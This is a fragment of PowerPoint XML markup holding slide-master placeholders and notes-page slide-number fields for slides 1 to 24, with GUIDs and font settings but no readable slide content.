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65DBD-C51A-4F36-812A-4BE4D09172BB}"/>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3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26E8E00-2034-4388-9E72-87B45A4CF61F}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678C9AE8-EC1F-42B2-BA76-9CD9EDE59D07}"/>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5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8516F128-3C6D-4FCA-9B01-8D8D0174362C}"/>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04C3F650-0A3F-440E-8BF7-7C8568BE9EBB}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:latin typeface="Liberation Sans" pitchFamily="18"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
              <a:cs typeface="Lohit Devanagari" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2006383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4269C9-4B87-444C-9749-8391BEDB4C11}"/>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D0C7C1F5-1B02-447D-8AF3-4FDE048E9221}"/>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50D24609-420B-4CBD-A1E1-6864F2323F9B}"/>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6528BFE9-6592-4E5E-8133-ADC70AACFA94}"/>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5162E90B-C43E-4894-A74B-5538949EA1CD}"/>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8EC641D8-4E31-44DE-86D3-A0C6AEC6556B}"/>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fld id="{0A631936-58C3-4D85-AD62-DC75D1922893}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="653099774"/>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ea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FD1E8E-7EF5-4AFF-A626-7B8770664430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{A0689905-4BFA-456A-94DF-30B95E11FD07}" type="slidenum">
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A980187-3B2E-496E-9A4D-7F11AE637130}"/>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B830D88-F3C0-4DB2-A95A-ED05E6A299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90806BB-F6F0-4627-9D85-AC1D3082E90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{960896A6-5A76-4431-A310-A1F8EBA77457}" type="slidenum">
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F24E0F8-C6F6-49A9-A776-5A49CE336CE3}"/>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03469E3-DDEB-4495-B7A5-341A8672B4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D13F4B7-EA04-4B3C-8D3C-EAE5EA4C0FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{33673BC2-7871-4BB3-85C3-B24C44BB01D2}" type="slidenum">
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1088423-B0FD-407B-85D3-638CBD317DEA}"/>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9E0FBD6-9032-43AC-9713-04060756B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47139C-30BB-429A-A0B2-82481AFE553E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{67A478C8-457F-489D-9264-62134FE79AD8}" type="slidenum">
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C67CF89-5CD8-4D78-805C-847FD9A5B47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386EA81-7E44-475C-BD15-4AC24F3DD2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8C8A8D-5689-4E30-A390-E1F328BE8713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{7B3179E2-6EE2-43B1-9B7B-C028FB56BA87}" type="slidenum">
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD658DC3-3373-4348-843D-DB020A50E718}"/>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9B2893A-17D8-4723-A000-A2F274B5361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8CFBB6-FF6E-4A98-9E55-652EA4BF988B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{9959896F-2E44-4CFE-940D-EFB73C56FB7E}" type="slidenum">
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CCF605-DA64-4C1F-ABEE-238DC4FADEAA}"/>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EBB46E4-3445-4367-A9F4-FF3735325D5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05D7F7-A58C-45C9-AFDA-E2297620C835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{9110C942-C442-4D92-A90D-9D1B71387C33}" type="slidenum">
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2317A48E-71BB-44D6-A0E6-42C59AE3F08E}"/>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7CCB4E2-C609-4B95-B004-FBE1D8D7A02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BB609C-41E7-482B-AD7F-82E1D54D1786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{56AD25C4-BA19-4DC9-8DBF-905075D9D67E}" type="slidenum">
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C79CA55-CF6B-469A-89BA-F508E58E637E}"/>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BC76E26-D185-4E31-924E-857A3DF731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149613-EDB7-46FE-80E4-8B8C5979E3E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{C6ECEC6A-EFEC-4072-B6E5-8713626D1FA8}" type="slidenum">
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91EA2948-D688-43B4-B717-F30E7EA694BE}"/>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33673C8-D91B-4613-BFB5-5B343C5C72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13E2BB-E45E-4E8E-B979-645E97DCF282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{506F7B32-FB80-4DEC-B596-118E05CB6D73}" type="slidenum">
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92971B9-BDA2-4C1D-B82C-5E69AAF74A11}"/>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8F214E7-8D2B-4DF0-8185-8D9758F508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D611D-76F4-43D6-9472-CE70E929F250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{538A4BAC-4843-4DBC-98E2-E9D91D59276C}" type="slidenum">
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E8AF550-25BA-4A65-BE4C-3C6D9BFC393E}"/>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326FB7F-A1DE-4E3C-A61A-763651D563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4CABB64-2B95-4F7A-A3B6-0A1F9FFDADF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{E67F97FC-B088-45FF-8286-9439FD1EF17C}" type="slidenum">
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B593BF-EC45-4C2D-B32D-204A882F0DE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4A30D5D-D27C-4914-9B73-A00DA3463D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E67654-18B9-43B9-BFB1-2D221A3542B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{906F07B9-82B7-4405-A441-D75140F5FCA1}" type="slidenum">
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760C4321-C6EF-4FF7-A8C7-7E4D9F9C1452}"/>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EAE416D-CC7C-40DF-A045-279AD1BF0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E119320-7A11-4EE5-A5B9-396144D13D10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{C7F04A67-5962-4E43-AB41-7C3E1D5EFA73}" type="slidenum">
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{952D211F-3874-4EE4-89AE-13A8B89CBCBA}"/>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F17A055-C3AC-4192-B133-B9CE4D8620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34A3F8-684D-449C-B4DA-51763211FE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{69B608A7-B1E0-479D-AFE8-6BAC8C17BE96}" type="slidenum">
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E282E883-8BBF-4B1F-8309-8291D670EF01}"/>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C5D04EA-879A-4536-B679-C27E42617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1C03D4-5D7F-4A6A-A8A9-43FBD56E1056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{E204A8E3-4B3F-4226-B085-56D209F8047E}" type="slidenum">
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{247D873B-A055-4591-BBEF-AAAB5026ADAB}"/>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3A6BE7F-BED2-45CD-912F-F5BFF8397E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B907BAB-7469-4407-8E18-AF76FDB5223E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{CFE1070C-ABCB-4D16-B8A9-0517F71793AE}" type="slidenum">
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E8B0CA-856E-4735-A24C-1441A54FD1C9}"/>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95380E-0B4A-4D82-8988-7035647DB8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3AFDC5-8D61-4D14-A0A5-94C7F679DB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{3FF9B942-E52E-49A4-B94F-B1ED92F92EAC}" type="slidenum">
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{421742DB-8EE2-4039-ACAC-FE03C5B1CA67}"/>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5D92FE2-8AA4-4F58-94AE-C4A1622D349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83C66A-047B-42C9-BD02-B46164BAA12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{6C06C13C-60F4-4774-857C-C3E0E49C256F}" type="slidenum">
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5916ED34-8EA7-4A83-B4D5-C64BC4C22684}"/>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FB887FE-03D5-4180-BD14-35D218B76CF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25E3F9-4FB4-496C-980D-B44E5D05376E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{E64383DA-1341-44BA-A138-EDD91081D139}" type="slidenum">
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B201FA6A-EBA8-429F-85D0-D657DE23A460}"/>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595DC0F-4DBF-447C-A405-4DEE1EEE04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5B2141-919B-4AF6-A60F-F6BC311D31AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{CA67DC76-8B48-4B44-BC5F-B0248331C3B9}" type="slidenum">
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343683BC-2FCD-4EFD-9788-0ABFCD7DEC2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01B8C14-1C07-4B04-93D8-83D1FF89717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A0EE86-D563-4585-A18C-5AEF42FB85DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{8F3B904F-43F3-487D-9CBD-1A3D3F6654AF}" type="slidenum">
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1974A7D5-4178-458C-9DEF-FDF819A335D1}"/>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0F4209E-1A23-4555-ABC4-EBAAD546999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8F6E9C-E4D1-4282-B47F-F4E52AA8FC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
